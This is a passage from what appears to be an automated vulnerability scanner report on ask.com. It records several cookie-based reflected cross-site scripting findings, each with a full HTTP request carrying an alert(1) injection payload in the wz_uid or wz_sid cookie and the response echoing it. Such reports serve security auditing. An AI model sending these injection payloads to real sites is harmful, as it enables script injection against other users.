Host:	http://www.ask.com
Path:	/about/legal/privacy

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a451'-alert(1)-'67adbcfa709 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /about/legal/privacy HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F32a451'-alert(1)-'67adbcfa709; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:45:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:04 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjA0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:04 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:04 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 39319

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
<title>About Ask.com: Privacy Policy</title>



<!-- y
...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F32a451'-alert(1)-'67adbcfa709;u4=014DDB4118C033B329ACD8C41BD460F3;u3=0;u2=;ord=-407579138?" width="1" height="1" frameborder="0">
...[SNIP]...

3.546. http://www.ask.com/about/legal/terms [wz_sid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/about/legal/terms

Issue detail

The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c9fa'-alert(1)-'96754ce8465 was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /about/legal/terms HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F37c9fa'-alert(1)-'96754ce8465; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:45:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:10 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjEwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:10 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 44334

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
<title>About Ask.com: Terms of Services</title>



<!-
...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=014DDB4118C033B329ACD8C41BD460F37c9fa'-alert(1)-'96754ce8465;u3=0;u2=;ord=-1128781019?" width="1" height="1" frameborder="0">
...[SNIP]...

3.547. http://www.ask.com/about/legal/terms [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/about/legal/terms

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b65a'-alert(1)-'f30f9b003b1 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /about/legal/terms HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F36b65a'-alert(1)-'f30f9b003b1; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:45:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:11 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:11 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:11 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 44334

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
<title>About Ask.com: Terms of Services</title>



<!-
...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F36b65a'-alert(1)-'f30f9b003b1;u4=014DDB4118C033B329ACD8C41BD460F3;u3=0;u2=;ord=-1385074267?" width="1" height="1" frameborder="0">
...[SNIP]...

3.548. http://www.ask.com/advertise [wz_sid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/advertise

Issue detail

The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fb15'-alert(1)-'9fef29dcb42 was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /advertise HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F32fb15'-alert(1)-'9fef29dcb42; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:45:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:15 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjE1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:15 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:15 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 37686

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=014DDB4118C033B329ACD8C41BD460F32fb15'-alert(1)-'9fef29dcb42;u3=0;u2=;ord=-1131964390?" width="1" height="1" frameborder="0">
...[SNIP]...

3.549. http://www.ask.com/advertise [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/advertise

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef363'-alert(1)-'0fd7bdbd4d3 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /advertise HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3ef363'-alert(1)-'0fd7bdbd4d3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:45:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:16 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjE2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:16 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:16 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 37684

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3ef363'-alert(1)-'0fd7bdbd4d3;u4=014DDB4118C033B329ACD8C41BD460F3;u3=0;u2=;ord=-96183465?" width="1" height="1" frameborder="0">
...[SNIP]...

3.550. http://www.ask.com/ans [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/ans

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9bc98'-alert(1)-'bd3e3e0e82e was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ans HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F39bc98'-alert(1)-'bd3e3e0e82e; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:46:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:46:59 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ2OjU5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:59 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:59 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 93735

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0A4EDD4111C033B329ACD8C41BD460F39bc98'-alert(1)-'bd3e3e0e82e;u4=;u3=;u2=0;ord=-267408614?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs
...[SNIP]...

3.551. http://www.ask.com/answers [wz_sid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/answers

Issue detail

The value of the wz_sid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef162'-alert(1)-'9cb00130769 was submitted in the wz_sid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /answers HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3ef162'-alert(1)-'9cb00130769; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:46:09 GMT
Content-Length: 29340
Connection: close
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:46:08 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ2OjA4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:08 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:08 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>My Questions & Answers - Ask Community</title><link REL="shortcut icon" HREF="http://sp.ask.com/sh/i/a14/favicon/favicon.ico"
...[SNIP]...
<iframe id="mar" src="http://fls.doubleclick.net/activityi;src=2903398;type=spons876;cat=ask_s775;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=014DDB4118C033B329ACD8C41BD460F3ef162'-alert(1)-'9cb00130769;u3=0;u2=;ord=-129464013?" width="1" height="1" frameborder="0">
...[SNIP]...

3.552. http://www.ask.com/answers [wz_uid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/answers

Issue detail

The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57747'-alert(1)-'ca35c7381e5 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /answers HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F357747'-alert(1)-'ca35c7381e5; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:46:11 GMT
Content-Length: 29341
Connection: close
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:46:11 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ2OjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:11 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:11 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>My Questions & Answers - Ask Community</title><link REL="shortcut icon" HREF="http://sp.ask.com/sh/i/a14/favicon/favicon.ico"
...[SNIP]...
